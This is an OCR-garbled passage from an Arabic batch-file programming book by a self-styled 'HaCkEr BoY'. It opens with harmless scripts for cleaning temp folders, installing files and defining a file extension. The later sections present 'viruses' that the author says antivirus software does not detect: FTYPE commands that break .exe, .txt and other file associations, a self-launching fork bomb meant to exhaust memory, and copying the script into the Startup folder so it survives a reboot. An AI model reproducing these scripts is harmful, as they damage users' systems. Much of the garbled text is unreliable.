قد تتساعءل» ما بال المؤلف؟ فتارة يقول دوس»› وتارة ويندوز.. 
إن دوس بالنسبة للملفات الدفعية يمكن أن يأخذ شكلين: 
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الثاني هو دوس الموجود في ويندوز؛ الذي يدعى (إطار دوس). 


لكن كلا النوعين يتعامل مع الحاسب بشكل مباشر» و الملف الدفعي سيكون له نفس النتيجة إذا ما تم تشغيله 


تحت أي من النوعين. 


الجزء التالي هو عبارة عن مجموعة من البرامج التطبيقية التي ستمكنك من احتراف كتابة الملفات الدفعية 
معتمدة على 'حفظك" للجزء السابق»ء و 'فهمك" للجزء اللاحق» لذلك أطلب منك أن تجهز لنفسك "كاسة متة" و 
'تمخمخ" معي أثناء دراسة هذا القسم» فهو بحاجة لربط الأفكار» وأن تكون كافة المعلومات المتعلقة بهذا الموضوع 
والتي هي بحوزتك» حاضرة في ذاكرتك القريبةء إن كنت قد فهمت قصدي فتوكل على نعم الوكيل» وابداً الجزء 
التالي. 
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كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr BoY^‏ 


البرنامج الأول باستخدام الملفات الدفعية ۴٥۶‏ 4)1 8: 


اصنع ملف نصي جديدء أو افتح المفكرة المرفقة مع sسهلمW1‏ و ذلك بضغط زر ابدأ ثم تشغيل» اكتب 
NoteP4‏ » ثم اضغط موافق و سيتم فتح المفكرة؛ الآن أنت جاهز لكتابة أول ملف دفعي. 


لنفرض أننا نريد أن نصنع برنامجاً يقوم بإفراغ مجلد y EMP‏ جلد TEMPORARY INTERNET‏ 
FILES‏ 


إن العبارات البرمجية (الأوامر) التي نجدها في أغلب الملفات الدفعية هي: 
عرض المسارات E٤٥10‏ 
مقاطعة عمل الملف الدفعي 8۸٤۸)‏ 


و إذا أردنا أن نبداً بكتابة الملف الدفعي» فيجب أن نقوم بضبط هاتين الخاصتين في بداية الملف الدفعي» لذلك 
ECHO OFF‏ 


BREAK OFF 
فالسطر الأول سيقوم بمنع عرض المسارات أثناء عمل الملف الدفعي» أما الثاني» فسيمنع مقاطعة الملف‎ 


الدفعي من قبل المستخدم» فالمستخدم يمكن أن يقاطع الملف الدفعي بأن يضغط زري € + 1٣ء‏ والأمر السابق 
من شأنه أن يمنع هذه المقاطعة. 


ثم سنكتب السطر التالي: 
ECHO This program will delete all files in temp folder and temporary internet files‏ 
folder.‏ 
ماذا يعني الأمر السابق؟ أو ما هي وظيفته؟ (راجع الأمر 840٤ع).‏ 
ثم السطر التالي: 
PAUSE‏ 


ما هي وظيفة هذا الأمر؟ (راجع الأمر .)۴٥۸ 0S٤‏ 


Created By Samer Bakkar ^HaCkEr BoY^ 44 


كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


الآن..» للوصول إلى المجلدين السابقين (اللذان نريد إفراغهما) يمكن الوصول إليهما بصورة مباشرة» أو عن 
طريق متغيرات ويندوز؛ فمجلد 1٤۷۴‏ يمكن استخدام المتغير 1۷۴ للوصول إليه» وأما بالنسبة لمجلد ملفات 
ارنت اة فكل ايه ريا الى كب افطر ي : 


DEL /Q /S /F %TMP%\*.* 
DEL /Q /S /F C\DOCUME~1\SAMERB~1\LOCALS~1\TEMPOR~1\*.* 


أنا أعتقد أن لديك الأسئلة التالية: 


1- لماذا الإشارة %؟ 
2= لماذا الأشارة ؟ 
3- من أين جلبت المتغير؟ 


دعني أبدأ من السؤال التالثء المتغيرات (متغيرات ويندوز) يمكن استعراضها بواسطة الأمر 1٤S؟»‏ حيث 
سترى اسم المتغير و بجانبه القيمة التي يحملهاء لكن لاحظ هنا (بالنسبة للسؤال الأول) أننا عندما استدعينا المتغير 
وضعنا بجانب اسمه من الجهتين علامة %» فهكذا يتم استدعاء أي متغير من المتغيرات» %المتغير% › وهكذا 
سيتم طلب القيمة التي يحملها لتحل مكان طلب استدعاءه» فمثلا إن أردنا أن نعرض رسالة على المستخدم» مكتوب 
فيها اسم مستخدم جهاز الكومبيوتر فسيكون الأمر كالتالي: 


ECHO %USERNAME% .. Hello In My Program 
وأثناء عمل البرنامج ستظهر نتيجة السطر السابق على الشكل:‎ 
SamerBakkar Hello In My Program 


هذا إن طبقت الأمر في جهازي › وبالطبع سيختلف مجموعة من المتغيرات من جهاز لآخر و من نظام 
n‏ غړا لآخر. 


نعود للسؤال الثاني» إن نظام 00S8‏ لا يتعامل مع الفراغات في أسماء المجلدات و الملفات» وإن كان يعرضها 
أحياناًء لكنه يعرضنا لمشاكل أثتاء عمل البرامج التي تعتمد عليهء و لتفادي هذه التغرة فإننا نقوم بالتالي: 


إذا كان هناك فراغ في اسم المجلد أو الملف فسيتم التوقف عندہ ووضع الإشارة ۔ہ تم الرقم 1ء والرقم 1 
نضعه إذا كان ترتيب الملف هجائيا بين الملفات الشبيهة الأسماء به هو الأولء مثلا: 


Sam Men 


Sam Rose 
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Sam Delta 


إذا أ ردنا الدخول إلى أحد المجلدات السابقة بواسطة الأمر C2‏ فلن ننجح بالطريقة المعتادة» أي صه؟ ٤5‏ 
Delta‏ 


فسنحصل على رسالة خطأء لذلك سنكتب: 1-صه؟ C5‏ هذا للدخول إلى المجلده)آا26 mهS‏ و سنكتب ٤C5‏ 
4-2 لندخل إلى المجلد ۷6١‏ صه؟» لاحظ الكلمات التي تأتي بعد كلمة 52۳ في كل اسم» و رتب هذه 
الكلمات هجائياء سيكون لديك الترتيب التالي: 


Sam Delta 
Sam Men 
Sam Rose 
لذلك فإن أسماءها في نظام دوس سنكون كالتالي بالترتيب من الأول إلى الأخير:‎ 
Sam~l 
Sam~2 


Sam~3 


نعود الآن إلى برنامجنا..» بعد أن يحذف البرنامج كافة الملفات الموجودة في المجلدين المذكورين نريده أن 
يمسح الشاشةء ثم يعطينا رسالة تفيد بأن المسح قد انتهى» و لعمل ذلك نكتب السطرين 


CLS 
ECHO Cleaning Is Done.. 
PAUSE 
؟P۸0S؟۴ لماذا أضفنا السطر الأخیر؟ أي‎ 
بعد ذلك نريد إنهاء البرنامج» لذلك سنكتب الأمر:‎ 
EXIT 
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الآن انتهينا من كتابة الكود» لكن كيف نحول هذا الكود إلى ملف دفعي؟ 
اضغط ملف» اختر حفظ باسم» ضع أي اسم تحبه و ضع في نهايته (44.) نقطة(.) وكلمة( 4ط)ء ثم اضغط 


الآن اذهب إلى الملف الذي قمت بحفظه سترى أن له أيقونة بيضاء في وسطها دائرة صفراء لها مسنناتء هذا 
هو ملفك الدفعي. 


إن برنامجك الذي أنجزته للتو قابل للتطوير و التعديلء لعرض الكود أو لتعديله (كود ملفك الدفعي) ضع مؤشر 
الفأرة على الملف الدفعي» اضغط زر يمين و اختر تحريرء سيظهر النص (الكود) الذي كتبته أمامك» عدل ما 
تريد ثم اختر قائمة ملف ثم حفظ, الآن تم حفظ التعديلات على ملفك الدفعي. 


قد يتساءل القارئ.. » ألن يستطيع أي شخص أن يأخذ الكود الذي أكتبه؟ 


سأجيبه أنا بنعم» وذلك بضغط الزر اليميني للفأرة فوق الملف الدفعي ثم اختيار 'تحرير"'. لكن ما رأيك بأن 
تحول برنامجك الذي صنعته قبل قليل إلى صيغة م×ه. بحيث تحمي الكود أولاء و تجعل برنامجك يظهر بمظهر 
آخر (احترافي)»ء سيقول لي القارئ "ايدي بزنارك" بس كيف؟» سأجيبه: 


هناك برنامج مرفق مع هذا الکتاب» اسمه 82۴0٣۷٥۲٤٥۲‏ يقوم بتحويل البرنامج من صيغة 4ط. إلى 
صيغة ع×ء.» طريقة استخدامه واضحة»ء لكن يجب عليك الالتزام بالتعليمات المرفقة مع البرنامج حتى يعمل 
را ل فد 
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البرنامج الثاني باستخدام الملفات الدفعية ۴1٥‏ ط8B4)c:‏ 
وهو برنامج تنصيب» أي مثل برنامج الصداء؟ أو الااهايم! الذي يقوم بتتصيب البرامج. 
افتح مستند جديد على المفكرة و لنبداً العمل.. 
ما هما أول سطرين ؟ وماذا يعملان؟ (راجع المثال التطبيقي السابق). 


بعد أن عطلنا عرض المسارات بوضع الأمر 0۴۴ E٣80‏ و منعنا مقاطعة الملف أثتاء عمله بواسطة الأمر 
BREAK OFF‏ سنجعل عنوان النافذة يحمل كلمة 11ئ1 » ثم سنضع رسالة مفادها أن هذا البرنامج هو عبارة 


عن برنامج إعداد لبرنامج #امصهS‏ على سبيل المثال» معنى كلامي السابق أن الأسطر الثلاث الأولى ستصبح 
كالتالي: 


ECHO OFF 
BREAK OFF 
TITLE Install 


ECHO. This Program Will Install Sample Program On Your Machine 


لاحظ أننا وضعنا E۳810.‏ و النقطة تفيد (إن وضعت بعد الأمر 810]٤ع]‏ بأنها ستترك مسافة واحدة في 
بداية السطر قبل عرض التعليق. 


و لكن قبل أن نضع الاختيار يجب أن نضع السطرين: 
ECHO. To Continue Press 1‏ 


ECHO. To Quit Priss 2‏ 
من المؤكد أنك تعرف معنى السطرين السابقين. 


الآن نضع الاختيار كالتالي: 
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الآن شرح كود الاختيار: 


CHOICE /c:12 

IF ERRORLEVEL 2 GOTO :CO 

IF ERRORLEVEL 1 GOTO :EX 

:CO 

MKDIR %ProgramFiles%o\Sample 

COPY *.* %ProgramFilesYo\Sample\ /Y 

COPY App.exe Y%USERPROFILE%\Desktop\ 

CLS 

ECHO. Installation Completed.. Press any key to quit 
PAUSE 


EXIT 


:EX 


EXIT 


CHOICE /c:12 


وهو الأمر الذي يقوم بعرض الاختيار على المستخدم» 12 هي الاختيارات المتاحة للمستخدم. 


IF ERRORLEVEL 1 GOTO :CO 


أي إذا ضغط المستخدم زر 1 (رقم 1)» فاذهب إلى النقطة :°٥0‏ 


IF ERRORLEVEL 2 GOTO :EX 


إذا ضغط المستخدم رقم 2 فاذهب إلى النقطة :٤×‏ 
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:CO 


النقطة التى سوف يذهب إليها البرنامج إذا اختار المستخدم رقم 1ء وما جود داخلھا پأتے فے ۱١‏ 
هي ي 1 مج ر ر م رقم 1ء وما هو موجو يادي هي 
التالي بعدهاء وهو: 


MKDIR %ProgramFiles%o\Sample 


MKDR‏ كما تعلمنا هو أمر لصنع مجلد» وما هو بعده هو مسار المجلد الذي سيتم صنعهء 
Program File%‏ هو متغير من متغيرات ويندوز» يشير إلى المسار الذي تنزل فيه البرامج بشكل افتراضي» 
أجل.. كان من الممكن أن نضع بدل هذا المتغير السطر التالي: 


C:\Progra~1 


لگن ماتا ر كان السشكع ق غير السار الى حت فز افر امح فة يشل افر اني؟ قان كان فد فمل ذلك: 
بدو الخ واضحا في ابرتامجاة ورغ الستظم فل ىء لا بخ للك فما باخام المكير 
Program Files %‏ أما eاSamp|‏ فهو المجلد الذي نريد صناعته. 


السطر التالي ضمن النقطة :٤0‏ هو: 
COPY *.* %ProgramFilesYo\Sample\ /Y‏ 


وسيقوم هذا السطر بنسخ كافة الملفات الموجودة ضمن المجلد الذي يوجد فيه الملف الدفعي إلى المجلد الذي 
صنعناه قبل قلیل. 


COPY App.exe %USERPROFILE%\Desktop\ 


يقوم بوضع اختصار للبرنامج على سطح المكتب» لاحظ أن ع×ع.م م۸ هو البرنامج التطبيقي. 


CLS 


ECHO. Installation Completed.. Press any key to quit 
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يقوم بعرض رسالة على المستخدم» "إن الإعداد قد انتهى» اضغط أي زر للإغلاق'. 
PAUSE‏ 
لعرض الرسالة "اضغط أي زر للمتابعة"'. 
EXIT‏ 
لإغلاق النافذة. 


إن الكلام السابق كله يحدث إذا ضغط المستخدم على زر 1ء أما إذا ضغط 2 فسيذهب البرنامج إلى النقطة 
:E×‏ التي لا یوجد داخلها سوی أمر الإنهاء .٤×]1٦‏ 


الآن حول الملف الذي كتبته إلى ملف دفعي و ضعه أينما شئت مع مجموعة ملفات» وشغله و انظر النتيجةء 


ولكت للأسف إن كان لديك ۴× sس0ل,W1‏ فستضطر لعمل خطوة إضافية. 
هناك نوعین من نوافذ الدوس في وندوس اکس بي الأول هو €°M5‏ و الثاني °C⁄٥MM AND‏ 


و النوع الأول لا يتعامل مع الملفات الدفعية بشكل سليم» لذلك سنقوم بعمل ملف دفعي آخر و نكتب فيه السطر 
التالي: 


COMMAND | Ins.bat 


حيث أن الإشارة | تشير إلى أننا نريد وضع أمرين أو أكثر في نفس السطرء و 118.041 هو اسم الملف الذي 


إن نافذة الدوس الافتراضية في ۶× [N00۷8‏ هي من النوع CM‏ و هذا السطر سوف يقوم بتشغيل 
النوع الثاني أي K0O™N" N4N‏ و يأمره بتشغيل الملف الدفعي الأول» وبذلك سيعمل الملف على أحسن وجه. 


لکن هناك خبر سيء آخر فيما يتعلق بويندوس اکس بي» فهو لا يعرف الأمر C101٣٤‏ لذلك ستضطر 
لحت خطرة الأختار و الك قور ا بس الات بد غركى رسال فل الستم تخرد أنه سرف بت شخ 


بعض الملفات. 


و إن كان لديك W1, M٤‏ أو 98 فالبرنامج الأول كافي بكل كفاءة لعمل التنصيب بشكل ممتاز . 
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البرنامج الثالث باستخدام الملفات الدفعية :8a)c1 ۴1٥۶‏ 


البرنامج الذي سأشرح كيفية صنعه الآنء برنامج خدمي جميل» لكنك يمكن أن تصنع بنفس هذه الطريقةء 
فيروس خطير يهدد أمن أنواع الملفات في النظامء هذا إن فهمت طريقة صنع البرنامج»ء وهذا هو هدفي من كتابة 


البرنامج الذي أنا بصدده الآن يقوم بصنع لاحقة جديدةء مثل م×ع. » أي سنصنع لاحقة برامج تنفيذية في 
الجهاز» سأعيد صياغة الفكرة بشكل أبسطء انظر إلى أي برنامج تشغله» ما هي لاحقة الملف الذي تشغل منه هذا 
البرنامج؟ء هناك عدة لواحق تشير إلى الملفات التنفيذية (أي عند تشغيلها سيتم تنفيذ برنامج ما)» أهم هذه اللواحق 
هي ×6. و إ0». و اهط. » إن السابقة هي أهم لواحق الملفات التنفيذيةء لكن ما رأيك بأن تصنع لاحقة خاصة 
ببرنامجك؟» أي يمكنك أن تصنع برنامجك بأي لغة برمجة كانت» ثم تصنع ملف دفعي يقوم بتعريف لاحقة خاصة 
للملفات التطبيقية أو التنفيذية سيعمل عليها برنامجك» أظن أن الفكرة جميلة نسبياًء دعنا الآن من الكلام و لنبداً 


إن هدف الفقرة ليس بهذه البساطةء إنما أريدك أن تتقن التعامل مع أنواع الملفات. 


أعد ذاكرتك إلى الخلف قليلاء أي إلى قسم أوامر دوس» هل تتذكر أمرأً يعرض أنواع الملفات الموجودة في 
الجهاز؟ 


أجل.. لقد أصبت» إنه الأمر ٠ ۸880٤٥‏ الذي يعرض كافة أنواع الملفات الموجودة في الجهاز» و يعرض 
برامج تشغيلهاء كما يتيح لك التعديل عليهاء و إضافة أنواع جديدة عليها. 


الآن أريدك من خلال الأمر ۸8500٥‏ أن تحزر ما هو برنامج تشغيل الملفات ذات اللاحقة م×ه.٠‏ إن أردت 
المساعدة فسيكون الأمر الذي يحضر لك ضالتك كالتالي: 


ASSOC .exe 
شاف دار رسا هر ف‎ 
ستكون نتيجة الأمر كالتالي:‎ 

.exe=exefile 
لاحظ من السطر السابق» أن نوع الملفات ع×ع. يتم تشغيله بواسطة المشغل الذي يدعى ء]ااع×م.‎ 


انتهت الخطوة الأولى» فهيا بنا للثانية.. 
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الآن نريد أن نعرف المسار الذي يعمل منه المشغل» بغض النظر إن كان المغل اسمه ماا؟م×ء أو غيره لأن 
المشغل سوف يختلف من نوع ملفات إلى آخر» فلمعرفة مسار المشغل نفعل ذلك بواسطة الأمر ۴۲۲۷۶۴٤۴‏ (كما 
ذكرنا سابقاً)» و يكون الأمر كالتالي: 


FTYPE exefile 
و ستكون النتيجة كالتالي:‎ 
exefile="%1" %* 


ستقول لي أين المسارء أليس كذلك؟» في الحقيقةء الملفات التنفيذية ليس لها مشغل خاص» لأن النظام بأكمله هو 
مشغلهاء وسيتم تعريف مسار برنامج تشغيلها على أنه *% "%1" لكنك إن أردت عرض برنامج تشغيل الملفات 
ذات اللاحقة صصصه. سيكون الأمر كالتالي: 


ASSOC .mmm 

و النتيجة ستكون: 
.mmm=MPlayer‏ 
الآن عرفنا أن برنامج تشغيل الملفات ذات اللاحقة صإصص. هو إءره[۴ 1ء ولعرض مساره نستخدم الأمر : 
FTYPE MPlayer‏ 

و ستكون النتيجة: 
MPlayer=mplay32.exe /play /close "YL"‏ 


و الآن عدت لتقول لي أين مسار البرنامج» و سأقول لك عد إلى الأمر ۴۸18 » وراجعه»ء ستجد أن ويندوز 
سيبحث في فهارس معينة عند بدء أي برنامج بهدف الحصول على ملفات دعم» افتح الدوس و نفذ الأمر ۴۸1۴ 
> لاحظ أن النتيجة ستكون كالتالي: 


PATH=C:\WINDO WS\system32;C:\WINDOWS;C:\WINDO WS\system32\WBEM;C 
:\Program Files\Support Tools\ 


إن هذه النتيجة تعني أنه سوف يتم البحث عن ملفات الدعم في الفهارس: 


1- C:\WINDOWS\system32 
2- C:\WINDOWS 
3- C:\WINDOWS\system32\WBEM 
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4- C:\Program Files\Support Tools\ 


الآن لنعد إلى مشغل الملفات ٣صص.‏ الذي یدعی مه1۴1 رأینا أن مشغله الفعلي هو e×م.32رهام»ء‏ أريدك 
أن تبحت في الفهارس التي وجدناها بواسطة الأمر P۸۲۴‏ فإن لم تجد ملفاً يدعی 32.e×6لهام‏ فلن أضع 
أصابعي على لوحة مفاتيح طوال حياتي هههههء سأوضح الکلام بشکل آکبرء إن مر عرض المسارات ۴۲۷۶۴ 
لم يخطئ» فبدلا من أن يعطينا النتيجة كالتالي: 


MPlayer= C:\WINDOWSt\system32\mplay32.exe /play /close "%L" 
أعطاها كالتالي:‎ 
MPlayer=mplay32.exe /play /close "YL" 


وليس هناك فرق بين النتيجتين» لأن وندوس بكل الأحوال سيبحث في المجلد S١32‏ عن ملفات الدعم؛ هل 


أصبحت الفكرة واضحة؟ 


و کمتال آخر عن المشتغلات (برامج الث لتشغبا ( و المسارات»› دعونا نعرف مسار برنامج انث التشغيل الذي ِد بشغل 
الملفات من النوع (اللاحقة) fلم.»‏ أي نفس نوع الملف الذي تقرؤه الآن» أتوقع أنك فتحت الدوس» وأجريت الأمر 
التالي: 


ASSOC .pdf 
لقد حصلت على النتيجة التالية:‎ 
.pdflAcroExch.Document 


و هذا يعني أن البرنامج الذي يشغل الملفات ذات اللاحقة گلم. يدعی me‏ Acr0Exch.Docuء‏ الآن دعنا نرى 
مسار هذا المشغل»ء سيكون ذلك بالأمر : 


FTYPE AcroExch.Document 
و ستكون النتيجة كالتالي:‎ 
AcroExch.Document="C:\Progra~1\Adobe\Acroba~1\Reader\AcroRd32.exe" "%1" 


لاحظ معي» لقد اختلفت النتيجةء فقد تم الإعلان عن موقع المشغل بشكل صريح وواضح» فالمشغل يقع على 
السواقة ٣:‏ في المجلد «Program ۴es‏ تم lلnمجٹد Acrobat 6.0 مû Adobe‏ ã۾p‏ المجلد ۲٥له۸R»‏ وأخير 1 
المشغل الفعلي لهذا النوع من الملفات وهو الملف ٥×م.۲0۸432٥۸.‏ 
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الآن أعتقد أنك أصبحت تجيد - إلى حد ما - التعامل مع أنواع الملفات و المشغلات. 


أذكر أن كان هدفنا من كل هذا الكلام حول أنواع الملفات و مشغلاتها هو تعريف لاحقة تعمل عمل لواحق البرامج 
التنفيذية.. أليس كذلاف؟ 
إن كل هذا البرنامج يتلخص في عدة أسطر هي: 
ECHO OFF‏ 
ASSOC .saz=MyAppendage‏ 
FTYPE MyAppendage=”%%1” %%o*‏ 
CLS‏ 


EXIT 


هذه هي كل المعضلةء لكن لحظة..» أذكر أني ذكرت أن هناك مشكلة في تعامل ۴× د۷1 مع بعض الأوامرء 
وللأسف..» فالأوامر السابقة مضمنة في الأوامر التي لا يتعامل معها C۷2‏ لذلك سنضطر لتشغيلها عن طريق 
نافذة ال »)C0MMNAND‏ لكن هل تذكر كيف؟ 


سأذكرك كيف سيتم ذلك بمثال آخر» وسنعمل حركة أخرى تضيف بعض الجمالية للبرنامج. 


لنفرض أننا صنعنا الملف الدفعي السابق» الذي أسميته أنت aطا.عع2ل١ء‏ مم4 حتى لو لم تسميه بهذا الاسم 
أريدك أن تغير لاحقته إلى أي لاحقة أخرىء» لنقم بتسميته الاسم 11ل.ععةل,ءمم «yA‏ أعلم أن اللاحقة 11. هي 
لاحقة ملفات مكتبات الربط الديناميكي» لكن صبراً عليْ» فسنقوم بعمل حركة بسيطة و جميلة. 


افتح مستند جديد على المفكرة و اكتب داخله التالي: 
ECHO OFF‏ 


COPY MyAppendage.dll c:\ MyAppendage. bat 
برأيك ماذا سيحدت عندما يتم تنفيذ السطر السابق؟‎ 


صح..» سيتم نسخ الملف 11ل.ءعةلمرءممMy4‏ إلى السواقة ا:٣‏ و إعادة تسمية النسخة الجديدة إلى 
.MyAppendage. bat‏ 


الآن لنكمل كتابة الملف الدفعي» سنضع بعد السطرين السابقين الأسطر التالية: 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY¥^‏ 


COMMAND | CALL C:\ MyAppendage.bat 


انتهينا الآن من كتابة البرنامج» اصنع الملف الدفعي الأخير بصورة طبيعيةء و ضعه مع ملف ال 011 المزيف»ء 
وسيتم العمل على أحسن ما يرام. 


أريد أن أنوه لشئ» إذا أردنا تعريف نوع ملفات يدوياً فإن ذلك مختلف بشئ بسيط عن تعريف نوع بواسطة ملف 
دفعي ذاتي التنفيذء فإن أردنا تعريف نوع يدوياً يكون العمل كالتالي: 


(COMMAND - Jیغشت‎ - نفتح نافذة دوس (ابدأً‎ -1 
ASSOC .saz= MyAppendage رمÎلl‎ بتSi‎ -2 
FTYPE MyAppendage=”%1” %* رمألl ثم نتب‎ -3 


و نكون قد انتهينا من العمل» الآن إذا أعدنا تسمية أي ملف لاحقته م×ء. إلى اللاحقة zهء.‏ فسيعمل الملف بشكل 
سليم على أنه ملف تنفيذي. 


لكن ما الفرق بين الطريقتين؛ 


إذا كنت قوي الملاحظة لدرجة كافية ستقول لي أننا في الطريقة الأولى (أي ملف دفعي) كتبنا إشارتي %› ولكن 
في الطريقة الثانية كتبنا إشارة واحدة. 


إن ويندوز أتناء تعامله مع المتغيرات و الملفات الدفعية يفرق بين %1 وبين %%1) ففي الملف الدفعي سيتم 
إلغاء إشارة % واحدة ووضع ما يأتي بعدها في ذخيرة الأمر 4850٥‏ لكن إن فعلنا ذلك يدوياء فسيتم إدخال 
كافة الأحرف و الرموز في القائمة. 
الآن قد انتهينا من صنع برنامجنا.. 


في الجزء التالي سأقوم بكتابة وشرح بعض الفيروسات» والجميل في هذه الفيروسات أنها غير معروفة من قبل 


الأنتي فايروس كد1۲ «٤۷‏ لذلك أريدك أن تركز معي جيدأء لكي يتحقق هدفي من كتابتها.. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


الفيروس الأول باستخدام الملفات الدفعية: 
قبل البدء بهذا الموضوع - أقصد الفيروسات - أعلن إخلاء مسؤوليتي عن أي استخدام لهذه الفيروسات أو طرق 


إن الفيروس الأول الذي سنقوم بصناعته يتصل بشكل مباشر بأنواع الملفات» لأن هذا الفايرس سيقوم بتعطيل كافة 
أنواع الملفات التي نريد تعطيلهاء أرجو الحذر عند العملء لأنك إن لم تستطع إصلاح ما خربت» فستضطر لإعادة 


لنبداً بصناعة الفيروس.. 
افتح المفكرة» واكتب داخلها: 
@ECHO OFF‏ 


FTYPE exefile=%%* 


EXIT 


انتهينا من صناعة الفايرس» فإذا صنعت من الكود السابق ملف دفعي وشغلته» وعدت لتشغل أي ملف ٤×۴٤‏ 
فسيعطيك ويندوز رسالة تشير إلى موقع خاطئ للملف. 
إن كنت قد تورطت وعملت ذلك» فلإصلاح العطل اصنع ملف دفعي جديد وضع داخله الأسطر التالية: 
@ECHO OFF‏ 
FTYPE exefile=”%%1” %%o*‏ 


EXIT 
و شغله» ستجد أنه تم إصلاح الخطأ.‎ 


إذا فهمت الفكرة من الأمر السابق (أقصد أمر التعطيل)» فستصنع فيروساً يدمر كافة اللواحق التي تعطيها لهء ون 


في الكود السابق قمنا بتعطيل كافة الملفات التي لاحقتها #×ه» تعال لنضف سطراً آخر يقوم بتعطيل لاحقة أخرى. 


@ECHO OFF 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr BoY^‏ 


FTYPE exefile=%%o* 

FTYPE txtfile=%%* 

EXIT 

لاحظ أننا أضفنا سطراً يقوم بتعطيل الملفات ذات اللاحقة »).» فنحن نضع الأمر ۴1۷۴۴ء ثم اسم مشغل 
الملفات» ثم إشارة = ثم *%%) وللحصول على اسم مشغل أي نوع من الملفات نكتب الأمر: 

ASSOC .txt 


بالأمر السابق سنحصل على مشغل الملفات ذات اللاحقة ×].ء والنتيجة هي عااfا×ا=ا»].»‏ أي أن المشغل هو 
ط× وللحصول على اسم مشغل أي نوع آخر نبدل .×٤‏ بالنوع الذي نريد» وسنحصل على النتيجة. 


وهكذا تكرن ف عطقا كر ع المقات؛ فى الحقفة تحن قي عملا هذا إتما تقوم بتضليل قوع الماقات عن برتامج 
التشغيل» ولا نقوم بأي شئ آخر . 


حاول وضع أكبر عدد من أنواع الملفات في ملفك الدفعي وستكون النتيجة أخطرء لأنك ستقوم بتعطيل عدد أكبر 
من الأنواع» وحاول انتقاء أنواع مهمة متثل م×ع. و "0. و .d0‏ و گلم. و .1p‏ و ۵۲ا. و إلى آخره من 
الأنواع المهمة. 


أفترض أنك قد تساءلت عن الرمز @ الذي وضعتھ قبل 0۴۴ ٤E€CH10‏ وسأقول لك ما فائدتھء ھو رمز یستخدہم 
في الملفات الدفعيةء ويفيد في تنفيذ الأمر الذي بعده دون كتابته على الشاشةء فلو صنعت ملف دفعي فيه الأمر 
1R‏ عند تنفيذ (تشغيل) الملف سيقوم الملف بطباعة الأمر 1۸( على الشاشةء ثم يظهر نتيجته» أما إذا وضعت 
الرمز @ قبله» أي هكذا »@51R‏ فسيقوم الملف الدفعي بعرض النتيجة دون طباعة الأمر» أي بيدأ مباشرة 
بإظهار النتيجة. 


ونحن إن وضعنا الرمز @ قبل الأمر 0۴۴ ۴٧10‏ فإن النتيجة هي تعميم الأمر على الملف الدفعي بشكل كلي» 
وبالتالي إخفاء الأوامر كلها والبدء مباشرة بعرض نتائج الأوامر الموجودة داخل الملف الدفعي دون طباعتها. 


Created By Samer Bakkar ^HaCkEr BoY^ 58 


كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


الفيروس الثاني باستخدام الملفات الدفعية: 


إن قصدي من كتابة أي كود -برنامج أو فيروس- هو أن تتعلم طريقة كتابة الكودء أقصد أنك بإمكانك أن تكتب 
أكثر من 100 فيروس مختلف بمجرد معرفتك حول كيفية التعامل مع أوامر دوس و كيفية وضعها داخل الملف 
الدفعي» ولكني سأبقى معك حتى تفهم كيفية كتابة تلك الأوامر بشكل سليم. 


هناك الكثير من الفيروسات التي يمكن صناعتهاء وأنا حائر أيها أختار» لكني في هذا الفايرس سأتطرق إلى أمر لم 
يرد سابقاء تابع معي كيفية صناعة الفايرس الذي يقوم بإغراق الذاكرة. 


مهمة هذا الفايرس هو تشغيل عدد لا نهائي من نوافذ الدوس حتى تمتلئ الذاكرةء فيضطر المستخدم لإعادة تشغيل 
الجهاز. 


إن هذا الفايرس لا يتعدى السطر الواحد وهو: 
START %batchfilename.bat‏ 

لكن شرح هذا السطر ربما يطول.. 

لقد تعلمنا ما هي وظيفة الأمر 51۸۸8١‏ لذلك لن نعيد شرحه. 


أما الرمز % فهي تشير إلى أن الذي سيأتي بعدها إما متغيرء أو اسم الملف الدفعي» عندما يعمل الكود السابق 
وعندما يرى دوس الرمز % فإنه سيتوقع أن المستخدم يريد استخدام متغير (أي مثل المتغيرات التي نحضرها من 
الأمر 581 أو نعرفها بواسطته)» ولكنه عندما يرى أن الكلمة لا تنتهي بالرمز % فلن يبقى أمامه سوى خيار 
واحد» وهو أن اسم الملف الدفعي الذي يعمل هو ما بعد الرمز %) وسيقوم بتنفيذ أمر ما بعدد لا نهائي و بناءً 
على ذلك فإن الكود السابق لن يعمل إلا إذا كان اسم الملف الدفعي هر batchfilename. bat‏ . 


إذأ.. إذا كان اسم الملف الدفعي 0W.‏ فكيف سيكون السطر السابق؟.. صح» سيكون كالتالي: 
START %WW.bat‏ 


والآن» لنأت لتفرعات الكود؛ إذا كان المستخدم الذي سيعمل الفايرس في جهازه لديه معرفة سطحية في دوس أو 
في الملفات الدفعية» سيضغط مباشرة و بدون أي تفكير على الزرين )0C1۸81+٣‏ فماذا علينا أن نفعل لمنعه؟ 


وإن كان المستخدم لا يعرف كيف يوقف عمل الملف الدفعي» أو أن الخطة قد نجحت» فسيعيد إقلاع الجهازء لكن 
ركز معي» إنه سيعيد إقلاع الجهاز» ومن طبيعة عمل الفيروسات أنها تقوم بأعمال مزعجة أو موؤذيةء إن كنت قد 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


بشكل عام» إن البرامج التي تعمل عند بداية الإقلاع يمكن أن تتواجد في عدة أماكن أهمها: 


2 الرج جسنر ي (محرر الت لتسجبا (- 
2- بدء التشغيل (الموجود في قائمة ابدأ). 
3- الملف الخطير والملف الدفعي الأول وهو ٤2ط.٥ع×٥٥0اںA.‏ 


إن التعامل مع الرجستري بواسطة الملفات الدفعية ممکن» لکنه يحتاج إلى موافقة المستخدم على خطوة ماء ومن 
طبيعة الفايرس أن يعمل دون أن يستشير أحداء لذلك سنستبعد الخيار الأول» و سنلجاً للخيار الثاني» ولكن كيف 
إن كنت قد فهمت الأمر S٤١‏ فستفعل ذلك ببساطة» لكني سأكتب الأمر» وهو: 
COPY batchfilename.bat YUSERPROFILE% \Start~1\Programs\Startup\‏ 
و بذلك نكون قد وضعنا الملف 2ط.ع41١ء]1اگطءاهط‏ في قائمة ابدأ» ضمن مجلد بدء التشغيل. 
